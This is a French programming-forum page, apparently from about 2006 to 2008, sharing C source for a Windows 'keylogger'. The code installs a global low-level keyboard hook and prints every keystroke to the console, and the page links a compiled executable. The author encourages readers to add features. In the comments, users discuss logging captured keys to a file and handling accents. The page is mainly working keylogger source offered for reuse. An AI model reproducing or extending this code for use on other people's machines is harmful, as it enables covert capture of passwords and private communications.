begin process at 2008 08 29 22:41:29
1 233 930 membres
450 nouveaux aujourd'hui
14 294 membres club

Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum.
Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

KEYLOGGER HOOK CLAVIER (SANS DLL)


Information sur la source

Catégorie :Système Classé sous : hook, clavier, sansdll, keylogger Niveau : Débutant Date de création : 09/10/2006 Date de mise à jour : 17/10/2006 23:37:14 Vu / téléchargé: 14 858 / 2 199

Note :
7,2 / 10 - par 5 personnes
7,20 / 10

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10

Commentaire sur cette source (24)
Ajouter un commentaire et/ou une note

Description

Voila j'ai fais un hook clavier de base sans aucune dll vous pouvez y rajouter vos options le code se compile en simple fichier source sous dev c++, ce code est libre si vous l'améliorer tenez moi au courrant !

je propose de rajouter un hook souris ...

ps : l' executable est disponible dans le .ZIP.

Source

  • #include <windows.h>
  • #include <stdio.h>
  • #include <stdlib.h>
  • // Global instance du hook
  • HHOOK hKeyHook;
  • // Gestion du hook
  • __declspec(dllexport) LRESULT CALLBACK KeyEvent (int nCode, WPARAM wParam, LPARAM lParam ) {
  • // Action du clavier et les touches tappées
  • if ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN)) {
  • // conversion du code -> ascii
  • BYTE KeyState[256];
  • WORD wBuf;
  • char ch;
  • // Structure pour récupération des informations
  • KBDLLHOOKSTRUCT hooked = *((KBDLLHOOKSTRUCT*)lParam);
  • /* Traitement récupération dec codes des touches */
  • // Etat du clavier
  • GetKeyboardState(KeyState);
  • // Conversion code > ascii
  • ToAscii(hooked.vkCode, hooked.scanCode ,KeyState,&wBuf,0);
  • //on rajoute les touches non traitées par le hook
  • switch(hooked.vkCode){
  • case 9 :{printf("<TAB>");break;}
  • case 13 :{printf("<ENTER>");break;}
  • case VK_BACK :{printf("<delete>");break;}
  • case VK_DELETE: {printf("<Suppr>");break;}
  • /* vous pouvez rajouter vos traitements perso ici ! */
  • default : { // on affiche les touches tappées
  • ch=((char)wBuf);
  • printf("%c",ch);
  • break;
  • }
  • }
  • }
  • // Renvoi des messages au sytème
  • return CallNextHookEx(hKeyHook, nCode,wParam,lParam);
  • }
  • // Boucle des messages
  • void MsgLoop()
  • {
  • MSG message;
  • while (GetMessage(&message,NULL,0,0)) {
  • TranslateMessage( &message );
  • DispatchMessage( &message );
  • }
  • }
  • DWORD WINAPI KeyLogger(LPVOID lpParameter)
  • {
  • // Récuperation de l'instance de notre executable
  • HINSTANCE hExe = GetModuleHandle(NULL);
  • if (!hExe) return 1;
  • // on demarre le hook
  • hKeyHook = SetWindowsHookEx (WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe, NULL);
  • if(hKeyHook==NULL)
  • printf("[le hook clavier a plante !]\n");
  • else
  • printf("[hook clavier en cours ...]\n");
  • // Boucle des messages
  • MsgLoop();
  • // on desactive le hook
  • if(UnhookWindowsHookEx(hKeyHook)==0)
  • printf("[desactivation du Hook echoue !]");
  • else
  • printf("[la desactivation du hook c'est passee correctement]");
  • return 0;
  • }
  • int main(int argc, char *argv[])
  • {
  • // initialisation des options pour la fonction CreateThread
  • HANDLE hThread;
  • DWORD dwThread;
  • DWORD exThread;
  • printf("\n[Exemple de Hook Clavier] by tOnyh2\n");
  • // on crée le thread qui va démarrer le hook
  • hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) KeyLogger, (LPVOID)NULL, NULL, &dwThread);
  • if (hThread) {
  • // Attente à l'infini
  • return WaitForSingleObject(hThread,INFINITE);
  • } else {
  • return 0;
  • }
  • }
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Global instance du hook
HHOOK hKeyHook;

// Gestion du hook
__declspec(dllexport) LRESULT CALLBACK KeyEvent (int nCode, WPARAM wParam, LPARAM lParam ) {
 
    // Action du clavier et les touches tappées
    if  ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN)) {
       
        // conversion du code -> ascii 
        BYTE KeyState[256];
        WORD wBuf;
        char ch;
        
        // Structure pour récupération des informations
        KBDLLHOOKSTRUCT hooked =  *((KBDLLHOOKSTRUCT*)lParam);

        /* Traitement récupération dec codes des touches */
        
        // Etat du clavier
        GetKeyboardState(KeyState);

        // Conversion code > ascii
        ToAscii(hooked.vkCode, hooked.scanCode ,KeyState,&wBuf,0);
        
        //on rajoute les touches non traitées par le hook
        switch(hooked.vkCode){
        
               case 9 :{printf("<TAB>");break;}
               case 13 :{printf("<ENTER>");break;}
               case VK_BACK :{printf("<delete>");break;}
               case VK_DELETE: {printf("<Suppr>");break;}
       
               /* vous pouvez rajouter vos traitements perso ici ! */
                
                default : { // on affiche les touches tappées
                       ch=((char)wBuf); 
                       printf("%c",ch);
                       break;
                }
             
        }
        

    }
    // Renvoi des messages au sytème
    return CallNextHookEx(hKeyHook, nCode,wParam,lParam);
}

 
// Boucle des messages 
void MsgLoop()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0)) {
        TranslateMessage( &message );
        DispatchMessage( &message );
    }
}


DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
    // Récuperation de l'instance de notre executable
    HINSTANCE hExe = GetModuleHandle(NULL);
    if (!hExe) return 1;

    // on demarre le hook
    hKeyHook = SetWindowsHookEx (WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe, NULL);
    if(hKeyHook==NULL)
        printf("[le hook clavier a plante !]\n");
    else
        printf("[hook clavier en cours ...]\n");
        
    // Boucle des messages
    MsgLoop();
    
    // on desactive le hook
    if(UnhookWindowsHookEx(hKeyHook)==0)
          printf("[desactivation du Hook echoue !]");
    else
          printf("[la desactivation du hook c'est passee correctement]"); 
          
    return 0;
}
 

int main(int argc, char *argv[])
{
    // initialisation des options pour la fonction CreateThread 
    HANDLE hThread;
    DWORD dwThread;
    DWORD exThread;
    printf("\n[Exemple de Hook Clavier] by tOnyh2\n");
        
    // on crée le thread qui va démarrer le hook
    hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) KeyLogger, (LPVOID)NULL, NULL, &dwThread);

    if (hThread) {
        // Attente à l'infini
        return WaitForSingleObject(hThread,INFINITE);
    } else {
        return 0;
    }
}

Conclusion

rien de serieux prévu pour l'instant... ^^
Pour les "Membres Club", vous pouvez télécharger directement un fichier contenu dans le zip sans télécharger le zip en entier !
  • hookclavier.exeTélécharger ce fichier [Réservé aux membres club]21 460 octets

Télécharger le zip

17 octobre 2006 14:34:44 :
.
17 octobre 2006 14:36:30 :
.
17 octobre 2006 23:37:14 :
suppression d'une condition inutile au hook
  • signaler à un administrateur
    Commentaire de nightlord666 le 09/10/2006 17:17:34

    Ben c'est deja beaucoup mieux que la version précédente. Par contre je connaissais pas l'astuce du __declspec(dllexport), c'est vrai que c'est pas bête :).

  • signaler à un administrateur
    Commentaire de kerneltony95 le 09/10/2006 19:57:50

    merci, la version précédente je l'ai fait pour m'amuser puis elle était repris d'un source déja présente sur ce site, par contre par rapport a la version précédente il y a des touche qui son ignorées et au niveau Caps log il est pris en compte que lorsque qu' on le press avant d' executer le programme, sinon il est ignoré, donc si quelqu' un a une idée pour améliorer tous ca ...

  • signaler à un administrateur
    Commentaire de deck_bsd le 09/10/2006 20:08:13

    je pense être ds le mm cas que toi, j'ai mm aussi fait un keylogger avec une pour le hook et ecrit les touches ds un fichier. Cependant je ne parvient pas a gerer les dead key non plus, donc si tu trouve la solution avant moi fait le moi savoir svp ;)

  • signaler à un administrateur
    Commentaire de nightlord666 le 09/10/2006 22:04:19

    Il y a une source sur ce site d'un keylogger qui gère les dead-keys, fait comme recherche "keylogger" dans cppfrance, tu va vite le trouver :)

  • signaler à un administrateur
    Commentaire de alibyte le 11/10/2006 01:39:50

    cool c'est ce que je recherchais jolie :)

  • signaler à un administrateur
    Commentaire de deck_bsd le 11/10/2006 19:05:40

    oui je l'ai trouvé aussi il y a un temps, mais ça solution ne fonctionne pas :s .

  • signaler à un administrateur
    Commentaire de kerneltony95 le 11/10/2006 19:45:11

    erf quelqu' un a une source en c c++ ou sa logue la ou clique la souris par exemple (les programes les bouton ...) qui peut se compiler avec dev c++?

  • signaler à un administrateur
    Commentaire de kerneltony95 le 11/10/2006 19:52:14

    ca fais lontemps que je cherche la soluce de faire un hook souris mais tous mes essais on echoué ... :'(

  • signaler à un administrateur
    Commentaire de Taron31 le 13/10/2006 23:13:40

    sympa mais il me semble qu'il y'avait déjà eu une source du même genre...

  • signaler à un administrateur
    Commentaire de Gendal67 le 16/10/2006 12:22:06

    Salut,

    Source simple mais qui semble efficace.
    Mais.... juste une question :

    if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);

    Interêt de cela puisque la création du thread est toujours lancée avec lpParameter = NULL ?
    (hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) KeyLogger, (LPVOID)NULL, NULL, &dwThread); )

    Sinon, à part les fautes d'orthographes, elle me semble bien sympa ta source, continue ;)

  • signaler à un administrateur
    Commentaire de Taron31 le 16/10/2006 21:02:47

    Je me suis retenu de la dire ^^

  • signaler à un administrateur
    Commentaire de Taron31 le 16/10/2006 21:39:11

    une question : pkoi tu gères la boucle des messages ??

  • signaler à un administrateur
    Commentaire de kerneltony95 le 17/10/2006 14:43:52

    je préfére les gérées dans une fonction ^^

    pour ta question Gendal, on es jamais trop prudent selon la version win, il se peut que le hook ne fonctione pas donc j'ai préféré utiliser ceci pour des raison de fonctionnement, aprés chacun code comme il a envie, chacun son style :)

  • signaler à un administrateur
    Commentaire de Taron31 le 17/10/2006 20:17:08

    Kernemtony>> nan jce que je voulais savoir c'est pourquoi tu gères les messages, est-ce vraiment indispensable ? si oui pkoi ?

    merci

  • signaler à un administrateur
    Commentaire de Gendal67 le 17/10/2006 20:55:34

    kerneltony> Oui d'accord mais alors pourquoi mettre (LPVOID) NULL en param lors de l'appel à CreateThread() ? Parce que alors, forcément, si appel à LoadLibrary() il y a, un LoadLibrary(NULL); et c'est là que je capte pas l'intêret :)

    Amicalement,
    Gendal67

  • signaler à un administrateur
    Commentaire de kerneltony95 le 17/10/2006 23:34:27

    taron >> pour la gestion des touche frapées au clavier envoyé a la fenetre msdos comme tu peus le remarquer elle est utilsée un peu plus bas...

    Gendal >> ui tu as raison, c' est une erreur de ma part merci, je corrige :)

  • signaler à un administrateur
    Commentaire de Taron31 le 23/10/2006 23:06:12

    oui j'ai vu que tu l'utilisais mais qu'est-ce qu'elle vient faire ici ? quekl interet? dsl je vois toujours pas
    si quelqu'une pouvait lm'expliquer...

  • signaler à un administrateur
    Commentaire de schysophrenic le 07/02/2007 09:02:29

    Super le code ^^ exactement ce que je cherchais pour mon projet .

    ++ :D

  • signaler à un administrateur
    Commentaire de Leptis le 26/07/2007 19:00:57

    Cette source est fort intéressante mais comment faire pour arrêter le hook ??

  • signaler à un administrateur
    Commentaire de shuty le 28/08/2007 11:21:17

    Tu arret le processuce ;)

  • signaler à un administrateur
    Commentaire de encoreUnAutre le 14/02/2008 00:55:51

    Salut,

    Mon problème vient surement du fait que je suis un noob, mais bon.

    Je bosse sous MVC++ et lorsque j'essaie de compiler ton code dans un fichier.cpp, je me retrouve avec un message d'erreur :
    c:\***\toto\toto.cpp(99): fatal error C1010: unexpected end of file while looking for precompiled header directive

    Est-ce du au fait que je ne suis pas sous devC++, si oui, quelqu'un peut-il me dire si il y a un équivalent MVC++?

    Merci.

  • signaler à un administrateur
    Commentaire de carat le 28/03/2008 12:36:23

    ENCOREUNAUTRE, rajoute #include "stdafx.h" au début de ton cpp! (première ligne!!!)

    Moi j'ai un problème avec ce code... il fonctionne parfaitement, je logge tout dans un fichier... mais les caractères spéciaux comme accents circonflèxes, thréma, etc... ne fonctionnent plus (ils sont doublé comme ceci: ^^i, ¨¨i)... une idée?

  • signaler à un administrateur
    Commentaire de Sniperr le 18/05/2008 11:01:48

    Bonjour, voilà, à la compilation, j'obtiens les erreurs suivantes :

    75 C:\Dev-Cpp\hookclavier.c [Warning] passing arg 4 of `SetWindowsHookExA' makes integer from pointer without a cast

    103 C:\Dev-Cpp\hookclavier.c [Warning] passing arg 2 of `CreateThread' makes integer from pointer without a cast

    103 C:\Dev-Cpp\hookclavier.c [Warning] passing arg 5 of `CreateThread' makes integer from pointer without a cast

    Quelqu'un peut m'éclairer ?
    Merci

  • signaler à un administrateur
    Commentaire de Sniperr le 18/05/2008 11:10:30

    J'ai inclus stdafx.h correctement, les warnings restent mais la compilation marche.
    J'ai une question cependant, quelqu'un aurait-il une idée de comment sauvegarder le contenu entré dans un fichier .txt ?
    Merci infiniment

Ajouter un commentaire

Discussions en rapport avec ce code source

Pub



Appels d'offres

Recherche developpeur ...
Budget : 700€
SITE MARCHAND LOCATION...
Budget : 3 000€
SITE MARCHAND POUR HOTEL
Budget : 4 000€

CalendriCode

Août 2008
LMMJVSD
    123
45678910
11121314151617
18192021222324
25262728293031

VS Express FR Gratuit !

VS Express en français et 100% gratuit !

Téléchargements

Boutique

Boutique de goodies CodeS-SourceS